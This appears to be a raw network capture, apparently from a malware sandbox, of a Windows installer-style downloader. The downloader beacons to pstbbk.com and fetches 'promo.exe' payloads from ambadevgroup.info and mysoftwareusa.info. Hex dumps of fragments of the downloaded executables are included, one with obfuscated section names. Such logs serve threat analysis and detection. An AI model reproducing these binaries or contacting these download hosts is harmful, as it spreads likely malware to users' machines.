Dec 6, 2023 14:52:13.801486015 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 55 8b ec 6a ff 68 14 10 5c 00 64 a1 00 00 00 00 50 81 ec b0 00 00 00 a1 24 30 6a 00 33 c5 89 45 f0 50 8d 45 f4 64 a3 00 00 00 00 6a 09 ba a0 73 62 00 8d 8d 48 ff ff ff e8 33 62 00 00 c7 45 fc 00 00 00 00 ba b4 73 62 00 6a 09 Data Ascii: Ujh\dP$0j3EPEdjsbH3bEsbj`bEsbjxbEsbjMaEsbjMaEtbjMaEtbjMaEEHPQjITEHh`y@jj
Dec 6, 2023 14:52:13.801599979 CET	1340	IN	Data Raw: fc 15 8b 8d 9c fe ff ff 85 c9 74 1d 8b 01 8b 50 10 8d 85 78 fe ff ff 3b c8 0f 95 c0 50 ff d2 c7 85 9c fe ff ff 00 00 00 00 c7 45 fc 1b 00 00 00 8d 8d a0 fe ff ff 51 8d 45 f0 50 51 e8 70 a1 03 00 c7 45 fc ff ff ff ff 8d 85 a0 fe ff ff 68 10 a3 43 Data Ascii: tPx;PEQEPQpEhCjj0PM~hpaMdYM3}]jhTb@j[haOYjhbAj[ha/Yjhb(Aj[haYj
Dec 6, 2023 14:52:13.801636934 CET	1340	IN	Data Raw: 6a 09 8d 4d 90 e8 61 58 00 00 c6 45 fc 03 ba f0 73 62 00 6a 09 8d 4d a8 e8 4e 58 00 00 c6 45 fc 04 ba 04 74 62 00 6a 05 8d 4d c0 e8 3b 58 00 00 c6 45 fc 05 ba 10 74 62 00 6a 04 8d 4d d8 e8 28 58 00 00 c7 45 fc 06 00 00 00 83 c4 18 8d 45 f0 8d 8d Data Ascii: jMaXEsbjMNXEtbjM;XEtbjM(XEEHPQ`jJEHh`y@jjP&yh@am\|MdYM3x]Ujh\dP$0j3EPEdjsbHWEsb
Dec 6, 2023 14:52:13.801676989 CET	1340	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec c8 00 00 00 a1 24 30 6a 00 33 c4 89 84 24 c4 00 00 00 8d 0c 24 c7 04 24 60 2e 63 00 51 8d 84 24 c4 00 00 00 c7 44 24 08 00 00 00 00 50 51 b9 9c b0 6a 00 c7 44 Data Ascii: U$0j3$$$`.cQ$D$PQjD$D$.cD$D$ D$$#cD$(D$,D$0.cD$4D$8D$</cD$@D$DD$HH/cD$LD$PD$T/cD$XD$\D$`/cD$
Dec 6, 2023 14:52:13.801713943 CET	1340	IN	Data Raw: dc 51 63 00 c7 45 a4 b4 b0 6a 00 c7 45 a8 03 00 00 00 c7 45 ac a4 51 63 00 c7 45 b0 b4 b0 6a 00 c7 45 b4 04 00 00 00 c7 45 b8 50 52 63 00 c7 45 bc c0 b0 6a 00 c7 45 c0 05 00 00 00 c7 45 c4 14 52 63 00 c7 45 c8 cc b0 6a 00 c7 45 cc 08 00 00 00 c7 Data Ascii: QcEjEEQcEjEEPRcEjEERcEjEERcEjEE\|RcEjE=UUU<@r)G#;PnA#HtWn3jjjEjE
Dec 6, 2023 14:52:13.801752090 CET	1340	IN	Data Raw: 02 33 c0 a3 e4 b1 6a 00 a3 e8 b1 6a 00 03 c6 a3 ec b1 6a 00 c7 45 d4 e4 b1 6a 00 c7 45 fc 00 00 00 00 8d 45 dc ff 75 d8 8b 35 e4 b1 6a 00 50 56 e8 c4 89 19 00 8d 04 be c7 45 d4 00 00 00 00 83 c4 0c a3 e8 b1 6a 00 c7 45 fc ff ff ff ff 68 b0 b5 61 Data Ascii: 3jjjEjEEu5jPVEjEhamMdY_^M3i].AMCUjh_dP$0j3PEdjhjdjjpau\a~yPjj$E
Dec 6, 2023 14:52:13.801788092 CET	1340	IN	Data Raw: 44 6a 00 c7 45 fc 01 00 00 00 c7 45 f0 98 44 6a 00 e8 ed 6f 00 00 85 c0 0f 84 a2 00 00 00 8b 10 8b c8 ff 52 0c 83 c0 10 a3 98 44 6a 00 c6 45 fc 03 c6 05 9c 44 6a 00 01 c7 45 f0 a0 44 6a 00 e8 bf 6f 00 00 85 c0 74 78 8b 10 8b c8 ff 52 0c 83 c0 10 Data Ascii: DjEEDjoRDjEDjEDjotxRDjEEDjotURDjEEDjyot2RDjEha/hMdY]h@khahYtjF5h a
Dec 6, 2023 14:52:13.801826000 CET	1340	IN	Data Raw: fc 09 33 c0 50 c7 05 b8 45 6a 00 00 00 00 00 b9 b8 45 6a 00 c7 05 c8 45 6a 00 00 00 00 00 c7 05 cc 45 6a 00 00 00 00 00 68 4c 74 62 00 c7 05 c8 45 6a 00 00 00 00 00 c7 05 cc 45 6a 00 07 00 00 00 66 a3 b8 45 6a 00 e8 f1 3d 00 00 c6 45 fc 0a 33 c0 Data Ascii: 3PEjEjEjEjhLtbEjEjfEj=E3PEjEjEjEjhLtbEjEjfEj=E3jEjEjEjEjEjfEjhldEjT=E3j
Dec 6, 2023 14:52:13.801865101 CET	1340	IN	Data Raw: 48 47 6a 00 00 00 00 00 b9 48 47 6a 00 c7 05 58 47 6a 00 00 00 00 00 c7 05 5c 47 6a 00 00 00 00 00 68 8c 5c 64 00 c7 05 58 47 6a 00 00 00 00 00 c7 05 5c 47 6a 00 07 00 00 00 66 a3 48 47 6a 00 e8 f2 38 00 00 c6 45 fc 1a 33 c0 50 0f 57 c0 c7 05 68 Data Ascii: HGjHGjXGj\Gjh\dXGj\GjfHGj8E3PWhGjxGjhGj\|GjhLtbf`GjxGj\|GjfhGj8E3PGjGjGjGjhLtbGjGjfGjK8E3P
Dec 6, 2023 14:52:13.987004042 CET	1340	IN	Data Raw: c7 05 e0 48 6a 00 00 00 00 00 b9 e0 48 6a 00 c7 05 f0 48 6a 00 00 00 00 00 c7 05 f4 48 6a 00 00 00 00 00 68 84 6e 64 00 c7 05 f0 48 6a 00 00 00 00 00 c7 05 f4 48 6a 00 07 00 00 00 66 a3 e0 48 6a 00 e8 ea 33 00 00 c6 45 fc 2a c7 05 f8 48 6a 00 00 Data Ascii: HjHjHjHjhndHjHjfHj3E*Hjj3IjIjHjhTudIjIjfHj3E+3jIjIj Ij$Ijhc Ij$IjfIjL3E,W30Ij

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:32.738078117 CET	230	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvancedInstaller Host: pstbbk.com Content-Length: 8 Cache-Control: no-cache
Dec 6, 2023 14:52:32.738315105 CET	62	OUT	Data Raw: 73 69 64 3d 32 35 39 38 Data Ascii: sid=2598
Dec 6, 2023 14:52:33.782325029 CET	238	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:36.159126997 CET	215	OUT	HEAD /load/1509/promo.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: ambadevgroup.info Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:52:36.408894062 CET	349	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:36 GMT Content-Type: application/x-msdos-program Content-Length: 1247744 Connection: keep-alive Vary: User-Agent Last-Modified: Sat, 02 Dec 2023 03:41:44 GMT ETag: "130a00-60b7ea9eab3a0" Accept-Ranges: bytes
Dec 6, 2023 14:52:36.409413099 CET	214	OUT	GET /load/1509/promo.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: ambadevgroup.info Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:52:36.660592079 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:36 GMT Content-Type: application/x-msdos-program Content-Length: 1247744 Connection: keep-alive Vary: User-Agent Last-Modified: Sat, 02 Dec 2023 03:41:44 GMT ETag: "130a00-60b7ea9eab3a0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 44 a7 6a 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 5a 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 13 00 00 04 00 00 bb ab 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 24 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 12 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 24 9e 05 00 00 40 0d 00 00 a0 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 12 00 00 76 00 00 00 94 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELDje"Zw@`@@@d\|@$u4@.text `.rdata@@.datalpH@.rsrc$@@@.relocuv@B
Dec 6, 2023 14:52:36.660609007 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYV
Dec 6, 2023 14:52:36.660643101 CET	1340	IN	Data Raw: 04 00 00 8b 03 8b 40 04 03 c7 83 b8 98 fb ff ff 00 75 ce ff 15 6c c8 49 00 8b 4f e0 85 c9 0f 85 6b 10 04 00 8b 4f d4 85 c9 0f 85 75 10 04 00 33 db 89 5f dc 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a Data Ascii: @ulIOkOu3_OO_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@
Dec 6, 2023 14:52:36.660655975 CET	1340	IN	Data Raw: b5 00 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
Dec 6, 2023 14:52:36.660685062 CET	1340	IN	Data Raw: 8b ca e8 c2 00 00 00 84 c0 75 01 c3 b0 01 c3 55 8b ec 51 51 56 57 8b 7d 08 8d 45 ff 50 8d 45 f8 c7 45 f8 01 00 00 00 50 57 8b f1 e8 4e 00 00 00 85 c0 78 38 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 Data Ascii: uUQQVW}EPEEPWNx8OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH
Dec 6, 2023 14:52:36.660746098 CET	1340	IN	Data Raw: 84 8b 04 04 00 8b 55 f8 8b 5d fc 83 e8 01 0f 85 ba fe ff ff e9 1e 04 04 00 8b 5d fc 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 Data Ascii: U]]EC}Pl]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9H
Dec 6, 2023 14:52:36.660782099 CET	534	IN	Data Raw: d7 00 00 8d 46 20 8d 4f 20 83 61 08 00 50 e8 d0 d7 00 00 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 40 89 51 10 89 41 1c 89 51 18 89 41 2c 8b c1 89 51 20 89 51 28 c3 55 8b ec 8b 45 08 85 c0 0f 8f 88 01 04 00 83 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 Data Ascii: F O aP_^]33@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;\|SA23~,F
Dec 6, 2023 14:52:36.660866976 CET	1340	IN	Data Raw: 00 50 68 ff 7f 00 00 ff 35 18 14 4d 00 ff 15 68 c3 49 00 ff 74 24 14 b9 f0 13 4d 00 e8 59 40 00 00 8a 5c 24 11 ff 35 00 14 4d 00 68 18 14 4d 00 e8 be f1 ff ff 85 c0 0f 85 61 00 04 00 80 7c 24 12 01 0f 84 73 00 04 00 e8 59 00 00 00 e8 34 01 00 00 Data Ascii: Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M=MuD$8PIL$(m_^[]U4SVWj<Ihj8I54Ijc5XMh5XMMh5X
Dec 6, 2023 14:52:36.660883904 CET	1340	IN	Data Raw: 84 8d fd 03 00 85 f6 0f 88 a5 fd 03 00 8b 4d 0c e8 f3 33 00 00 8d 4e 01 8b f8 51 6a 01 57 e8 4a 3a 00 00 83 c4 0c 89 75 e0 33 c0 89 5d e8 40 89 45 ec 53 50 8d 45 e0 50 57 e8 8f 40 00 00 83 c4 10 8d 4d e0 e8 74 9f 00 00 85 f6 7e 35 8d 45 f0 50 8d Data Ascii: M3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MKEPM#;\|M"hM+M@_^[U;Q}BAM;t4!x]MhI:2VWw7'G$
Dec 6, 2023 14:52:36.660896063 CET	1340	IN	Data Raw: 05 e0 23 4d 00 3c c9 49 00 89 1d e4 23 4d 00 89 1d e8 23 4d 00 89 1d ec 23 4d 00 c7 05 f0 23 4d 00 66 00 00 00 e8 4e 74 00 00 8d 4c 24 28 e8 3e 05 00 00 8d 54 24 28 8b ca e8 30 fe ff ff 68 28 cb 49 00 8d 4c 24 2c e8 91 fe ff ff 8d 44 24 28 b9 c8 Data Ascii: #M<I#M#M#M#MfNtL$(>T$(0h(IL$,D$(#MPL$tL$mqD$3PjVhIhIL$cL$(c_^#M[]UVWMsMU39w +EPOEEPO(
Dec 6, 2023 14:52:36.840147972 CET	1340	IN	Data Raw: 34 01 00 00 50 e8 8a 0f 02 00 59 59 8d 84 24 18 01 00 00 50 56 ff 15 d0 c4 49 00 8d 4c 24 08 e8 7c 5e 00 00 5e 8b e5 5d c3 55 8b ec 56 8b 75 08 57 8b f9 85 f6 74 15 8d 46 ff 50 52 57 e8 ba 98 02 00 83 c4 0c 33 c0 66 89 44 77 fe 5f 5e 5d c3 55 8b Data Ascii: 4PYY$PVIL$\|^^]UVuWtFPRW3fDw_^]UQM;sH]PUVhPjIPM&bMM]^UVjPh1hItP}0hhI

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:38.843319893 CET	147	OUT	GET /stats/3/0/0 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.3 Host: mysoftwareusa.info
Dec 6, 2023 14:52:39.203223944 CET	441	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 192 Connection: keep-alive Vary: Accept-Encoding Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Dec 6, 2023 14:52:39.221637964 CET	147	OUT	GET /stats/3/1/0 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.3 Host: mysoftwareusa.info
Dec 6, 2023 14:52:39.581283092 CET	441	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 192 Connection: keep-alive Vary: Accept-Encoding Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Dec 6, 2023 14:52:39.589330912 CET	146	OUT	GET /archives/5 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.3 Host: mysoftwareusa.info
Dec 6, 2023 14:52:39.896316051 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:39 GMT Content-Type: application/octet-stream Content-Length: 2713088 Connection: keep-alive Content-Disposition: attachment; filename=promo.exe Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 da fa 65 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 94 06 00 00 8c 03 00 00 00 00 00 00 50 6a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 6a 00 00 04 00 00 f0 74 29 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 60 0a 00 95 00 00 00 00 30 08 00 6a 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 0a 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 08 00 00 10 00 00 00 6e 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6a 24 02 00 00 30 08 00 00 10 01 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 0a 00 00 02 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 3b 00 00 70 0a 00 00 02 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 65 62 65 79 74 7a 6b 00 e0 24 00 00 70 45 00 00 d2 24 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6b 7a 6e 70 66 74 62 00 10 00 00 00 50 6a 00 00 02 00 00 00 64 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELeePj@`jt)@m`0j$a n@.rsrcj$0~@.idata `@ ;p@jebeytzk$pE$@ukznpftbPjd)@
Dec 6, 2023 14:52:39.896380901 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 6, 2023 14:52:39.896405935 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 6, 2023 14:52:39.896419048 CET	296	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 6, 2023 14:52:39.896513939 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Yxp
Dec 6, 2023 14:52:39.896611929 CET	1340	IN	Data Raw: 71 37 76 67 11 7a 8a 8f 4e d3 9e 87 fa a1 3f 43 80 a0 6f 0e bf 2b 93 7c 45 b7 06 bd e2 03 6a 16 51 01 b1 11 17 3b e9 af 5b cf a5 f9 53 74 a9 1d d2 43 87 99 d5 71 0e 8d da bd cd d8 1a 8c 36 77 e1 37 28 d8 99 14 b9 fb f6 84 cb bc 5e dc 8c f5 71 1c Data Ascii: q7vgzN?Co+\|EjQ;[StCq6w7(^q^'0(lm}4$Hcm]+4W"YC/i5=Lh!jorJ{1l p0^5dVOxUc~\p
Dec 6, 2023 14:52:39.896684885 CET	1340	IN	Data Raw: f0 a7 80 cd aa 63 db ab 49 ae 5d ec a7 99 7a a9 37 bd e8 bc f5 af bb a8 0c 9a 4e 6d 02 9d de 40 3a 23 1f 18 17 57 00 55 e6 47 d6 71 af 63 22 74 da 3e b9 58 41 7a a3 ce 1d 07 2b 96 cd 5c 29 ad 87 a5 00 01 45 fb 86 5d c6 c9 7f de cb db 82 26 a7 95 Data Ascii: cI]z7Nm@:#WUGqc"t>XAz+\)E]&Zjjx7X IIyFahCqDfhL8H%`gH\_},qiO; \|pY<Gpgw^~4gF*^"ndFy}
